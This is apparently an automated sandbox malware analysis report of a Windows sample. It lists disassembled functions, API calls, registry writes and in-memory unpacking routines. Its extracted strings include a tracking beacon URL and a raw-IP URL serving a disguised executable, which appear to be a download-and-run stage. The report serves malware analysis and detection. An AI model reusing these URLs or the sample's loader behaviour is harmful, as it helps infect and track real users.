                                                                                  • Source File: 00000000.00000002.4210942714.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DA9000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2da9000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 3833638111-0
                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                  • Instruction ID: d02e4c8e25711c1ffe1a9e692533be659b923f34247f0970dc2b3d390d9713e5
                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                  • Instruction Fuzzy Hash: 52F06D36200B116FD7203BF9A89CF6EB6F8AF49625F140628E642912C0DBB0EC45CE61
                                                                                  Function 00432F49 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 74 432f49-432f59 75 432f73-432f75 74->75 76 432f5b-432f6e call 42ead6 call 42eae9 74->76 78 432f7b-432f81 75->78 79 4332dd-4332ea call 42ead6 call 42eae9 75->79 93 4332f5 76->93 78->79 82 432f87-432fb2 78->82 98 4332f0 call 42a5bd 79->98 82->79 83 432fb8-432fc1 82->83 86 432fc3-432fd6 call 42ead6 call 42eae9 83->86 87 432fdb-432fdd 83->87 86->98 91 432fe3-432fe7 87->91 92 4332d9-4332db 87->92 91->92 97 432fed-432ff1 91->97 95 4332f8-4332fd 92->95 93->95 97->86 101 432ff3-43300a 97->101 98->93 103 433027-433030 101->103 104 43300c-43300f 101->104 107 433032-433049 call 42ead6 call 42eae9 call 42a5bd 103->107 108 43304e-433058 103->108 105 433011-433017 104->105 106 433019-433022 104->106 105->106 105->107 111 4330c3-4330dd 106->111 137 433210 107->137 109 43305a-43305c 108->109 110 43305f-43307d call 4336c7 call 43348a * 2 108->110 109->110 147 43309a-4330c0 call 43480e 110->147 148 43307f-433095 call 42eae9 call 42ead6 110->148 114 4330e3-4330f3 111->114 115 4331b1-4331ba call 43d385 111->115 114->115 119 4330f9-4330fb 114->119 126 43322d 115->126 127 4331bc-4331ce 115->127 119->115 123 433101-433127 119->123 123->115 128 43312d-433140 123->128 130 433231-433249 ReadFile 126->130 127->126 132 4331d0-4331df GetConsoleMode 127->132 128->115 133 433142-433144 128->133 135 4332a5-4332b0 GetLastError 130->135 136 43324b-433251 130->136 132->126 138 4331e1-4331e5 132->138 133->115 139 433146-433171 133->139 141 4332b2-4332c4 call 42eae9 call 42ead6 135->141 142 4332c9-4332cc 135->142 136->135 143 433253 136->143 145 433213-43321d call 43348a 137->145 138->130 144 4331e7-433201 ReadConsoleW 138->144 139->115 146 433173-433186 139->146 141->137 154 4332d2-4332d4 142->154 155 433209-43320f call 42eab3 142->155 150 433256-433268 143->150 152 433203 GetLastError 144->152 153 433222-43322b 144->153 145->95 146->115 157 433188-43318a 146->157 147->111 148->137 150->145 161 43326a-43326e 150->161 152->155 153->150 154->145 155->137 157->115 165 43318c-4331ac 157->165 168 433270-433280 call 432c65 161->168 169 433287-433292 161->169 165->115 180 433283-433285 168->180 174 433294 call 432db5 169->174 175 43329e-4332a3 call 432aa5 169->175 181 433299-43329c 174->181 175->181 180->145 181->180
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                  • Instruction ID: d6ce50a492f9084338ba33edda2eca6d731db0489828e8dd55d9f9b17e416b32
                                                                                  • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                  • Instruction Fuzzy Hash: 6EC11370E04245AFDB11DFA9D841BAFBBB0BF0D305F08119AE815A7392C3789A41CB69
                                                                                  Function 0043D05C Relevance: 13.8, APIs: 9, Instructions: 272COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 182 43d05c-43d08c call 43cdbf 185 43d0a7-43d0b3 call 43979e 182->185 186 43d08e-43d099 call 42ead6 182->186 192 43d0b5-43d0ca call 42ead6 call 42eae9 185->192 193 43d0cc-43d115 call 43cd2a 185->193 191 43d09b-43d0a2 call 42eae9 186->191 202 43d37e-43d384 191->202 192->191 200 43d182-43d18b GetFileType 193->200 201 43d117-43d120 193->201 206 43d1d4-43d1d7 200->206 207 43d18d-43d1be GetLastError call 42eab3 CloseHandle 200->207 204 43d122-43d126 201->204 205 43d157-43d17d GetLastError call 42eab3 201->205 204->205 211 43d128-43d155 call 43cd2a 204->211 205->191 209 43d1e0-43d1e6 206->209 210 43d1d9-43d1de 206->210 207->191 221 43d1c4-43d1cf call 42eae9 207->221 214 43d1ea-43d238 call 4396e7 209->214 215 43d1e8 209->215 210->214 211->200 211->205 224 43d23a-43d246 call 43cf3b 214->224 225 43d248-43d26c call 43cadd 214->225 215->214 221->191 224->225 231 43d270-43d27a call 4335ed 224->231 232 43d27f-43d2c2 225->232 233 43d26e 225->233 231->202 234 43d2e3-43d2f1 232->234 235 43d2c4-43d2c8 232->235 233->231 239 43d2f7-43d2fb 234->239 240 43d37c 234->240 235->234 238 43d2ca-43d2de 235->238 238->234 239->240 241 43d2fd-43d330 CloseHandle call 43cd2a 239->241 240->202 244 43d332-43d35e GetLastError call 42eab3 call 4398b0 241->244 245 43d364-43d378 241->245 244->245 245->240
                                                                                  APIs
                                                                                    • Part of subcall function 0043CD2A: CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                                                  • GetLastError.KERNEL32 ref: 0043D170
                                                                                  • __dosmaperr.LIBCMT ref: 0043D177
                                                                                  • GetFileType.KERNEL32(00000000), ref: 0043D183
                                                                                  • GetLastError.KERNEL32 ref: 0043D18D
                                                                                  • __dosmaperr.LIBCMT ref: 0043D196
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0043D1B6
                                                                                  • CloseHandle.KERNEL32(?), ref: 0043D300
                                                                                  • GetLastError.KERNEL32 ref: 0043D332
                                                                                  • __dosmaperr.LIBCMT ref: 0043D339
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                  • String ID:
                                                                                  • API String ID: 4237864984-0
                                                                                  • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                  • Instruction ID: 006e68bf3f1d2291baca7e3f3ccd15ce7d6f583b40adfd1c0386b5d8b5644812
                                                                                  • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                  • Instruction Fuzzy Hash: 70A13632E101049FDF19AF68EC917AE7BA0AF0A324F14115EF805AB3D1D7389D12CB5A
                                                                                  Function 0483003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 250 483003c-4830047 251 4830049 250->251 252 483004c-4830263 call 4830a3f call 4830e0f call 4830d90 VirtualAlloc 250->252 251->252 267 4830265-4830289 call 4830a69 252->267 268 483028b-4830292 252->268 273 48302ce-48303c2 VirtualProtect call 4830cce call 4830ce7 267->273 270 48302a1-48302b0 268->270 272 48302b2-48302cc 270->272 270->273 272->270 279 48303d1-48303e0 273->279 280 48303e2-4830437 call 4830ce7 279->280 281 4830439-48304b8 VirtualFree 279->281 280->279 283 48305f4-48305fe 281->283 284 48304be-48304cd 281->284 287 4830604-483060d 283->287 288 483077f-4830789 283->288 286 48304d3-48304dd 284->286 286->283 292 48304e3-4830505 LoadLibraryA 286->292 287->288 293 4830613-4830637 287->293 290 48307a6-48307b0 288->290 291 483078b-48307a3 288->291 294 48307b6-48307cb 290->294 295 483086e-48308be LoadLibraryA 290->295 291->290 296 4830517-4830520 292->296 297 4830507-4830515 292->297 298 483063e-4830648 293->298 299 48307d2-48307d5 294->299 302 48308c7-48308f9 295->302 300 4830526-4830547 296->300 297->300 298->288 301 483064e-483065a 298->301 303 48307d7-48307e0 299->303 304 4830824-4830833 299->304 305 483054d-4830550 300->305 301->288 306 4830660-483066a 301->306 307 4830902-483091d 302->307 308 48308fb-4830901 302->308 309 48307e2 303->309 310 48307e4-4830822 303->310 314 4830839-483083c 304->314 311 48305e0-48305ef 305->311 312 4830556-483056b 305->312 313 483067a-4830689 306->313 308->307 309->304 310->299 311->286 315 483056f-483057a 312->315 316 483056d 312->316 317 4830750-483077a 313->317 318 483068f-48306b2 313->318 314->295 319 483083e-4830847 314->319 321 483059b-48305bb 315->321 322 483057c-4830599 315->322 316->311 317->298 323 48306b4-48306ed 318->323 324 48306ef-48306fc 318->324 325 483084b-483086c 319->325 326 4830849 319->326 333 48305bd-48305db 321->333 322->333 323->324 327 483074b 324->327 328 48306fe-4830748 324->328 325->314 326->295 327->313 328->327 333->305
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0483024D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID: cess$kernel32.dll
                                                                                  • API String ID: 4275171209-1230238691
                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                  • Instruction ID: 01da83acf3f3efab45a9c2b8a7dc47b506995a27eb813aac1f159fd40c68b907
                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                  • Instruction Fuzzy Hash: 14528974A01229DFDB64CF58C984BACBBB1BF09305F1485D9E80DAB351DB30AA85DF50
                                                                                  Function 00402C24 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 185networkCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C47
                                                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E5F
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00402E70
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00402E73
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleOpen_wcslen
                                                                                  • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                  • API String ID: 3067768807-1501832161
                                                                                  • Opcode ID: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                                                  • Instruction ID: 48789f1b3701ba946f3e6b41f8bd096f2728906552624118b4e60daa7bc135c0
                                                                                  • Opcode Fuzzy Hash: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                                                  • Instruction Fuzzy Hash: 89516095A65344A8E320EFB0BC52F363378EF58712F10643BE518CB2B2E3B59944875E
                                                                                  Function 004051F5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                  • String ID: %X@
                                                                                  • API String ID: 1687354797-3313093589
                                                                                  • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                                                  • Instruction ID: b3e9ac138a89c9aab4b32a44e65933d882eee500b320c13cfd578e42c41f9d09
                                                                                  • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                                                  • Instruction Fuzzy Hash: 3D214172C042499ADF15EBE9D881BDEB7F8AF08318F14407FE504B72C1DB7D99488A69
                                                                                  Function 0042DFE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                                                  • ExitThread.KERNEL32 ref: 0042DFFA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastThread
                                                                                  • String ID: 11@$f(@
                                                                                  • API String ID: 1611280651-1277599000
                                                                                  • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                  • Instruction ID: 8ccfe30e394ff3a7da82f1aad20c2a43f0afb1cc8a6867a0b2db1ae1affa3120
                                                                                  • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                  • Instruction Fuzzy Hash: 5BF0C874600624AFDB04AFB1D80ABAD3B70FF49715F10056EF4055B392CB796955CB68
                                                                                  Function 00405825 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • std::_Cnd_initX.LIBCPMT ref: 00405841
                                                                                  • __Cnd_signal.LIBCPMT ref: 0040584D
                                                                                  • std::_Cnd_initX.LIBCPMT ref: 00405862
                                                                                  • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405869
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                  • String ID:
                                                                                  • API String ID: 2059591211-0
                                                                                  • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                                                  • Instruction ID: d72f8bc51fec51febc5e3899202a3526e07d3a061d0a8301a91111c4e624332c
                                                                                  • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                                                  • Instruction Fuzzy Hash: 20F0A7714007009BE7317762C817B0A77A0AF0031DF10883FF15A769E2CF7DA8544A5D
                                                                                  Function 00402980 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 435 402980-4029eb call 426850 call 42a36b call 42b474 call 402843 444 4029f9-402a13 call 404358 call 40f8f4 435->444 445 4029ed-4029f0 435->445 445->444 446 4029f2-4029f6 445->446 446->444 448 4029f8 446->448 448->444
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 004029AF
                                                                                  • __fassign.LIBCMT ref: 004029BF
                                                                                    • Part of subcall function 00402843: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                  • String ID: 4+@
                                                                                  • API String ID: 2843524283-3700369575
                                                                                  • Opcode ID: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                                                  • Instruction ID: 257e808548a25f0c421a3fe296c20495207b494aef35f76eb7bec397418e7454
                                                                                  • Opcode Fuzzy Hash: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                                                  • Instruction Fuzzy Hash: 1801F9B1E0021C5ADB24FA25EC46BEF7768AB41304F0402FFA705E31C1D9785E45CA88
                                                                                  Function 0042E134 Relevance: 4.6, APIs: 3, Instructions: 54threadCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 452 42e134-42e13f 453 42e141-42e153 call 42eae9 call 42a5bd 452->453 454 42e155-42e168 call 42e0eb 452->454 470 42e1a5-42e1a8 453->470 459 42e196 454->459 460 42e16a-42e187 CreateThread 454->460 464 42e198-42e1a4 call 42e05d 459->464 462 42e1a9-42e1ae 460->462 463 42e189-42e195 GetLastError call 42eab3 460->463 468 42e1b0-42e1b3 462->468 469 42e1b5-42e1b7 462->469 463->459 464->470 468->469 469->464
                                                                                  APIs
                                                                                  • CreateThread.KERNEL32(?,?,Function_0002DFE0,00000000,?,?), ref: 0042E17D
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,0040CF33,00000000,00000000,?,?,00000000,?), ref: 0042E189
                                                                                  • __dosmaperr.LIBCMT ref: 0042E190
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 2744730728-0
                                                                                  • Opcode ID: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                                                  • Instruction ID: e33ff4e630afc97a712763e24a24b73512c1ee0121ef7b9dc61686095db8a569
                                                                                  • Opcode Fuzzy Hash: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                                                  • Instruction Fuzzy Hash: 7F01D236600229ABDB119FA3FC05AAF3B69EF81360F50013AF91582210DB358921DBA8
                                                                                  Function 00434775 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 473 434775-43478d call 439941 476 4347a0-4347b6 SetFilePointerEx 473->476 477 43478f-434794 call 42eae9 473->477 479 4347c7-4347d1 476->479 480 4347b8-4347c5 GetLastError call 42eab3 476->480 484 43479a-43479e 477->484 483 4347d3-4347e8 479->483 479->484 480->484 485 4347ed-4347f2 483->485 484->485
                                                                                  APIs
                                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDFA,00000000,00000002,0040DDFA,00000000,?,?,?,00434824,00000000,00000000,0040DDFA,00000002), ref: 004347AE
                                                                                  • GetLastError.KERNEL32(?,00434824,00000000,00000000,0040DDFA,00000002,?,0042C181,?,00000000,00000000,00000001,?,0040DDFA,?,0042C236), ref: 004347B8
                                                                                  • __dosmaperr.LIBCMT ref: 004347BF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 2336955059-0
                                                                                  • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                  • Instruction ID: 3f4161a45120eee3ca6c804ab5e0c8b7ff266a4415271cac2496bd2984e95623
                                                                                  • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                  • Instruction Fuzzy Hash: CC016836610114ABCB159FAADC058EF7B29EFCA730F24030AF814872C0EB74AD418794
                                                                                  Function 00402BCD Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 487 402bcd-402bf9 RegCreateKeyExW 488 402bfb-402c0d RegSetValueExW 487->488 489 402c0f-402c12 487->489 488->489 490 402c14-402c17 RegCloseKey 489->490 491 402c1d-402c23 489->491 490->491
                                                                                  APIs
                                                                                  • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BEF
                                                                                  • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C07
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C17
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateValue
                                                                                  • String ID:
                                                                                  • API String ID: 1818849710-0
                                                                                  • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                  • Instruction ID: 5f9d8f05081ab8e61a544dd9ed380a1f0a89feb258115cbe41ff1dcf5e2af099
                                                                                  • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                  • Instruction Fuzzy Hash: 75F0B4B650011CFFEB214F94DD89DAFBA7CEB417E9F100175FA01B2150D6B14E009664
                                                                                  Function 0042E094 Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 492 42e094-42e0a1 call 431f7e 495 42e0a3-42e0a6 ExitThread 492->495 496 42e0ac-42e0b4 492->496 496->495 497 42e0b6-42e0ba 496->497 498 42e0c1-42e0c7 497->498 499 42e0bc call 435516 497->499 501 42e0d4-42e0da 498->501 502 42e0c9-42e0cb 498->502 499->498 501->495 504 42e0dc-42e0de 501->504 502->501 503 42e0cd-42e0ce CloseHandle 502->503 503->501 504->495 505 42e0e0-42e0ea FreeLibraryAndExitThread 504->505
                                                                                  APIs
                                                                                    • Part of subcall function 00431F7E: GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                                                    • Part of subcall function 00431F7E: _free.LIBCMT ref: 00431FB8
                                                                                    • Part of subcall function 00431F7E: SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                                                  • ExitThread.KERNEL32 ref: 0042E0A6
                                                                                  • CloseHandle.KERNEL32(?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0CE
                                                                                  • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                  • String ID:
                                                                                  • API String ID: 1198197534-0
                                                                                  • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                  • Instruction ID: 02d263aed51cb6b3bee4cffa2fb4446158e609bbc081d0db7e94150c61e2e04c
                                                                                  • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                  • Instruction Fuzzy Hash: 8FF05E302006347BDB356F27E808A5B3AA8AF05764F484726B924C37A1D7B8DD828698
                                                                                  Function 0043CFEB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 506 43cfeb-43d005 call 43f961 509 43d007-43d00a 506->509 510 43d00c-43d024 call 43d05c 506->510 511 43d038-43d03b 509->511 513 43d029-43d037 call 43348a 510->513 513->511
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID: 'C
                                                                                  • API String ID: 269201875-3508614867
                                                                                  • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                  • Instruction ID: ac23cf383b269f77c0b068b48fc7cf8c71372a03a023b6a8bdb9567da4463856
                                                                                  • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                  • Instruction Fuzzy Hash: D0F09A32810008BBCF155E96EC01DDF3B6AEF89338F10115AFA1492150DA3A8A22ABA4
                                                                                  Function 004023BA Relevance: 3.1, APIs: 2, Instructions: 129windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004023E1
                                                                                  • PostQuitMessage.USER32(00000000), ref: 00402583
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePostProcQuitWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3873111417-0
                                                                                  • Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                                                  • Instruction ID: f7540e8b067131d9abd8b97533556e050534cde561c52fa9c46de49641595c4f
                                                                                  • Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                                                  • Instruction Fuzzy Hash: 91410C15A64384A9E730EFA5BD15B2537B0EF64762F10253BE528DB2F2E3B58580C30E
                                                                                  Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(0000215D), ref: 00401562
                                                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$Sleep
                                                                                  • String ID: http://176.113.115.37/ScreenUpdateSync.exe
